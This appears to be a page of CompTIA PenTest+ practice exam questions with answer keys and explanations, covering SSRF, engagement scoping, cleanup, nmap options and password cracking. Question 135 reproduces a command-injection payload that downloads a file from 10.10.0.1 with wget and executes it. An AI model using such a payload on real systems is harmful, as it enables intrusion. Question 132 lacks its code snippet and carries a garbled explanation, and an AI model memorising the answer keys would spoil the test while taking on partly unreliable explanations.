CompTIA CompTIA Certifications PT0-002 Questions & Answers

• Question 131:

  A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider's metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited?

  A. Cross-site request forgery

  B. Server-side request forgery

  C. Remote file inclusion

  D. Local file inclusion

  Correct Answer: B

  Server-side request forgery (SSRF) is the vulnerability that the tester exploited by querying the provider's metadata and getting the credentials used by the instance to authenticate itself. SSRF is a type of attack that abuses a web application to make requests to other resources or services on behalf of the web server. This can allow an attacker to access internal or external resources that are otherwise inaccessible or protected. In this case, the tester was able to access the metadata service of the cloud provider, which contains sensitive information about the instance, such as credentials, IP addresses, roles, etc.

  Reference: https://owasp.org/www-community/attacks/Server_Side_Request_Forgery

• Question 132:

  The following PowerShell snippet was extracted from a log of an attacker machine:

  

  A penetration tester would like to identify the presence of an array. Which of the following line numbers would define the array?

  A. Line 8

  B. Line 13

  C. Line 19

  D. Line 20

  Correct Answer: A

  $X=2,4,6,8,9,20,5 $y=[System.Collections.ArrayList]$X $y.RemoveRange(1,2) As you can see the arrat has no brackets and no periods. IT HAS SEMICOLLINS TO SEPERATE THE LISTED ITEMS OR VALUES.

• Question 133:

  A penetration tester is cleaning up and covering tracks at the conclusion of a penetration test. Which of the following should the tester be sure to remove from the system? (Choose two.)

  A. Spawned shells

  B. Created user accounts

  C. Server logs

  D. Administrator accounts

  E. Reboot system

  F. ARP cache

  Correct Answer: AB

  Removing shells: Remove any shell programs installed when performing the pentest.

  Removing tester-created credentials: Be sure to remove any user accounts created during the pentest. This includes backdoor accounts. Removing tools: Remove any software tools that were installed on the customer's systems that were

  used to aid in the exploitation of systems.

• Question 134:

  A penetration tester joins the assessment team in the middle of the assessment. The client has asked the team, both verbally and in the scoping document, not to test the production networks. However, the new tester is not aware of this request and proceeds to perform exploits in the production environment. Which of the following would have MOST effectively prevented this misunderstanding?

  A. Prohibiting exploitation in the production environment

  B. Requiring all testers to review the scoping document carefully

  C. Never assessing the production networks

  D. Prohibiting testers from joining the team during the assessment

  Correct Answer: B

  The scoping document is a document that defines the objectives, scope, limitations, deliverables, and expectations of a penetration testing engagement. It is an essential document that guides the penetration testing process and ensures that both the tester and the client agree on the terms and conditions of the test. Requiring all testers to review the scoping document carefully would have most effectively prevented this misunderstanding, as it would have informed the new tester about the client's request not to test the production networks. The other options are not effective or realistic ways to prevent this misunderstanding.

• Question 135:

  A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = "POST "

  exploit += "/cgi-bin/index.cgi?action=loginandPath=%27%0A/bin/sh${IFS} ?

  c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS }apache;${IFS}./apache'%0A%27andloginUser=aandPwd=a"

  exploit += "HTTP/1.1"

  Which of the following commands should the penetration tester run post-engagement?

  A. grep -v apache ~/.bash_history > ~/.bash_history

  B. rm -rf /tmp/apache

  C. chmod 600 /tmp/apache

  D. taskkill /IM "apache" /F

  Correct Answer: B

  The exploit code is a command injection attack that uses a vulnerable CGI script to execute arbitrary commands on the target system. The commands are: cd /tmp: change the current directory to /tmp wget http://10.10.0.1/apache: download a file named apache from http://10.10.0.1 chmod 777 apache: change the permissions of the file to allow read, write, and execute for everyone ./apache: run the file as an executable The file apache is most likely a malicious payload that gives the attacker remote access to the system or performs some other malicious action. Therefore, the penetration tester should run the command rm -rf /tmp/apache post-engagement to remove the file and its traces from the system. The other commands are not effective or relevant for this purpose.

• Question 136:

  A penetration tester needs to perform a vulnerability scan against a web server. Which of the following tools is the tester MOST likely to choose?

  A. Nmap

  B. Nikto

  C. Cain and Abel

  D. Ethercap

  Correct Answer: B

  https://hackertarget.com/nikto-website-scanner/

• Question 137:

  Which of the following BEST explains why a penetration tester cannot scan a server that was previously scanned successfully?

  A. The IP address is wrong.

  B. The server is unreachable.

  C. The IP address is on the blocklist.

  D. The IP address is on the allow list.

  Correct Answer: C

  The most likely explanation for why a penetration tester cannot scan a server that was previously scanned successfully is that the IP address is on the blocklist. Blocklists are used to prevent malicious actors from scanning servers, and if the IP address of the server is on the blocklist, the scanning process will be blocked.

• Question 138:

  A penetration tester who is performing a physical assessment of a company's security practices notices the company does not have any shredders inside the office building. Which of the following techniques would be BEST to use to gain confidential information?

  A. Badge cloning

  B. Dumpster diving

  C. Tailgating

  D. Shoulder surfing

  Correct Answer: B

• Question 139:

  A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache. Which of the following commands will accomplish this task?

  A. nmap –f –sV –p80 192.168.1.20

  B. nmap –sS –sL –p80 192.168.1.20

  C. nmap –A –T4 –p80 192.168.1.20

  D. nmap –O –v –p80 192.168.1.20

  Correct Answer: C

  This command will scan the host 192.168.1.20 on port 80 using the following options:

  -A: This option enables OS detection, version detection, script scanning, and traceroute. This will help to determine if the host is running an approved version of Linux and a patched version of Apache, as well as other information about the

  host and the network path.

  -T4: This option sets the timing template to aggressive, which speeds up the scan by increasing the number of parallel probes, reducing the timeouts, and assuming faster responses.

  -p80: This option specifies the port to scan, which is 80 in this case. Port 80 is commonly used for HTTP services, such as Apache web server.

  Reference: https://nmap.org/book/man-version-detection.html

• Question 140:

  A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?

  A. John the Ripper

  B. Hydra

  C. Mimikatz

  D. Cain and Abel

  Correct Answer: A

  Reference: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/